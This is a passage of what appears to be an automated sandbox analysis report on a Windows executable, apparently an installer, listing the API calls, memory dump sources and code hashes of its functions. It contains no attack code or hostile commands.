• ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA60
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
• String ID: ChangeWindowMessageFilterEx$user32.dll
• API String ID: 142928637-2676053874
• Opcode ID: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
• Instruction ID: 20967f7a279d57b19857f2ad39d34e10c6be6de8430a8d3efc5b40b14e24a4c3
• Opcode Fuzzy Hash: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
• Instruction Fuzzy Hash: 99E092A1741B20EAEA10B7B67C86FAA2658EB1076DF500037F100A51F1C3BD1C80CE9E
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F089), ref: 0044C7EB
                                                                                                                            • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C7FC
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C80C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                            • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                                                                            • API String ID: 2238633743-1050967733
                                                                                                                            • Opcode ID: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                                                                            • Instruction ID: d6497c9818d993b67a5702c7731996643d684f189bbd4b702b1f6e54e13363b7
                                                                                                                            • Opcode Fuzzy Hash: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                                                                            • Instruction Fuzzy Hash: 50F0DA70282305CAE750BBB5FDD57263694E3A470AF18277BE841551A2C7B94844CB8C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                                                                            • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                                                                            • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                            • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                                                                            • API String ID: 667068680-222143506
                                                                                                                            • Opcode ID: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                                                                                            • Instruction ID: 32a0137ea675787c0bb1f7a77b9c903aea73f6d33f3aa717a8ad139b0a70eb03
                                                                                                                            • Opcode Fuzzy Hash: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                                                                                            • Instruction Fuzzy Hash: 4DC0C9F02C1700EEAA01B7B11DCAA7A255CC500728320843F7049BA182D97C0C104F3C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetFocus.USER32 ref: 0041B57E
                                                                                                                            • GetDC.USER32(?), ref: 0041B58A
                                                                                                                            • GetDeviceCaps.GDI32(?,00000068), ref: 0041B5A6
                                                                                                                            • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5C3
                                                                                                                            • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5DA
                                                                                                                            • ReleaseDC.USER32(?,?), ref: 0041B626
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EntriesPaletteSystem$CapsDeviceFocusRelease
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2502006586-0
                                                                                                                            • Opcode ID: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                                                                            • Instruction ID: 1753bd22f5710d4f749a3cf2d8329d0f84e6490acb09e3fae29671003709e3a5
                                                                                                                            • Opcode Fuzzy Hash: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                                                                            • Instruction Fuzzy Hash: D0410631A04258AFDF10DFA9C885AAFBBB4EF59704F1484AAF500EB351D3389D51CBA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
                                                                                                                            • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045D184,?,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0F6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast
                                                                                                                            • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                                                                            • API String ID: 1452528299-1580325520
                                                                                                                            • Opcode ID: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
                                                                                                                            • Instruction ID: 81e1e27ad3ae8d1ea1d6b81b4c13ff0be47bc54c17845d393ef4ad8e2f10c1e8
                                                                                                                            • Opcode Fuzzy Hash: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
                                                                                                                            • Instruction Fuzzy Hash: 2C117535A04608AFD731DA91C942B9EB6ADDF4470AF6040776D00572C3D67C5F0B992E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetSystemMetrics.USER32(0000000B), ref: 0041BDD5
                                                                                                                            • GetSystemMetrics.USER32(0000000C), ref: 0041BDDF
                                                                                                                            • GetDC.USER32(00000000), ref: 0041BDE9
                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0041BE10
                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0041BE1D
                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041BE56
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CapsDeviceMetricsSystem$Release
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 447804332-0
                                                                                                                            • Opcode ID: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                                                                            • Instruction ID: d5b995c8e3894394b735eabd433659eae54025482fea58e306a85006fdca5b97
                                                                                                                            • Opcode Fuzzy Hash: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                                                                            • Instruction Fuzzy Hash: E5212A74E04648AFEB00EFA9C941BEEB7B4EB48714F10846AF514B7690D7785940CB69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0047E766
                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CD49), ref: 0047E78C
                                                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0047E79C
                                                                                                                            • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047E7BD
                                                                                                                            • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047E7D1
                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047E7ED
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Long$Show
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3609083571-0
                                                                                                                            • Opcode ID: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
                                                                                                                            • Instruction ID: 463a5c2536fff799c7bf7cf61cbf8045bc8b98cac2b0bb45a0840e8ed8c25010
                                                                                                                            • Opcode Fuzzy Hash: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
                                                                                                                            • Instruction Fuzzy Hash: 53010CB5641210ABEA00D769DE81F6637D8AB1C320F0943A6B959DF3E3C738EC408B49
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0041A6E0: CreateBrushIndirect.GDI32 ref: 0041A74B
                                                                                                                            • UnrealizeObject.GDI32(00000000), ref: 0041B27C
• SelectObject.GDI32(?,00000000), ref: 0041B28E
• SetBkColor.GDI32(?,00000000), ref: 0041B2B1
• SetBkMode.GDI32(?,00000002), ref: 0041B2BC
• SetBkColor.GDI32(?,00000000), ref: 0041B2D7
• SetBkMode.GDI32(?,00000001), ref: 0041B2E2
  • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
• String ID:
• API String ID: 3527656728-0
• Opcode ID: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
• Instruction ID: d03b18a2b949c207061bd18b8e5d47ed8ce294e6be165222704fda36eef26a4f
• Opcode Fuzzy Hash: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
• Instruction Fuzzy Hash: 56F0CD756015009BDE00FFAAD9CBE4B3B989F043097048496B908DF187CA3CD8649B3A
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
• CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: CloseCreateFileHandle
• String ID: !nI$.tmp$_iu
• API String ID: 3498533004-584216493
• Opcode ID: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
• Instruction ID: 7da7e9bbb2667b7856572ae533a3071efe8e017fb0344d9459fa270775feb22d
• Opcode Fuzzy Hash: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
• Instruction Fuzzy Hash: 1831C5B0A00249ABCB11EF95D842B9EBBB4AF44345F20453AF810B73C2D7785F058B69
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
• ShowWindow.USER32(?,00000005,00000000,00497FC1,?,?,00000000), ref: 00497D92
  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
  • Part of subcall function 004072A8: SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
  • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
• String ID: .dat$.msg$IMsg$Uninstall
• API String ID: 3312786188-1660910688
• Opcode ID: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
• Instruction ID: abb28459e614be91aca1b68aa70fad33032f6e559e3bf784a216f74f74fa669e
• Opcode Fuzzy Hash: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
• Instruction Fuzzy Hash: 89314F34A14114AFCB00EF65DD9296E7BB5EF89314F91857AF800AB395DB38BD01CB68
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EADA
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAE0
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB09
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: AddressByteCharHandleModuleMultiProcWide
• String ID: ShutdownBlockReasonCreate$user32.dll
• API String ID: 828529508-2866557904
• Opcode ID: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
• Instruction ID: 7e091cf0cf0c4dae12ae48626bdfb721f4796128e550bb25d34418d77cfbcdd5
• Opcode Fuzzy Hash: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
• Instruction Fuzzy Hash: 70F0C8D034061136E620B57F5C82F7B598C8F94759F140436B109E62C2D96CA905426E
Uniqueness

Uniqueness Score: -1.00%

APIs
• MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00458028
• GetExitCodeProcess.KERNEL32(?,?), ref: 00458049
• CloseHandle.KERNEL32(?,0045807C), ref: 0045806F
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: CloseCodeExitHandleMultipleObjectsProcessWait
• String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
• API String ID: 2573145106-3235461205
• Opcode ID: 0165f3f1031fc1aa6e60b3a9799ba1014783226e14f241c311df118ccfede771
• Instruction ID: 2f0632834368beac7d1c7250186d6a5b4d0e74160b608b18ba1b2b0c741dc3d5
• Opcode Fuzzy Hash: 0165f3f1031fc1aa6e60b3a9799ba1014783226e14f241c311df118ccfede771
• Instruction Fuzzy Hash: 8101A231600204AFD710EBA98C02A5A73A8EB49B25F51407BFC10E73D3DE399E08965D
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
• InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: AddressExchangeHandleInterlockedModuleProc
• String ID: ChangeWindowMessageFilter$user32.dll
• API String ID: 3478007392-2498399450
• Opcode ID: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
• Instruction ID: c922fa4e85abb1c6873f36dcd01b6443d81c66d6c3501223796626af46e79b09
• Opcode Fuzzy Hash: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
• Instruction Fuzzy Hash: 5CE0ECB2740324EADA103B627E8AF663558E724B19F50043BF001751F1C7FD1C80CA9E
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
• GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: AddressHandleModuleProcProcessThreadWindow
• String ID: AllowSetForegroundWindow$user32.dll
• API String ID: 1782028327-3855017861
• Opcode ID: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
• Instruction ID: d51ed2a8d8be4cb67b0f2e6afaff03014389f5b4c9f6752a27b175deb1fe6994
• Opcode Fuzzy Hash: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
• Instruction Fuzzy Hash: D7D0C790248701B9D910B3F64D46E9F3A5D894471CB50C47BB418E61C5DA7CFD04893D
Uniqueness

Uniqueness Score: -1.00%

APIs
• BeginPaint.USER32(00000000,?), ref: 00416C52
• SaveDC.GDI32(?), ref: 00416C83
• ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D45), ref: 00416CE4
• RestoreDC.GDI32(?,?), ref: 00416D0B
• EndPaint.USER32(00000000,?,00416D4C,00000000,00416D45), ref: 00416D3F
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Paint$BeginClipExcludeRectRestoreSave
• String ID:
• API String ID: 3808407030-0
• Opcode ID: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
• Instruction ID: 8164e3b37c2b38cc39b91ef4074089abf19b8963c3e0e5cbd12a4ce3d65b1abe
• Opcode Fuzzy Hash: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
• Instruction Fuzzy Hash: A1415070A002049FCB14DBA9C585FAA77F9FF48304F1540AEE8459B362D778DD81CB58
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
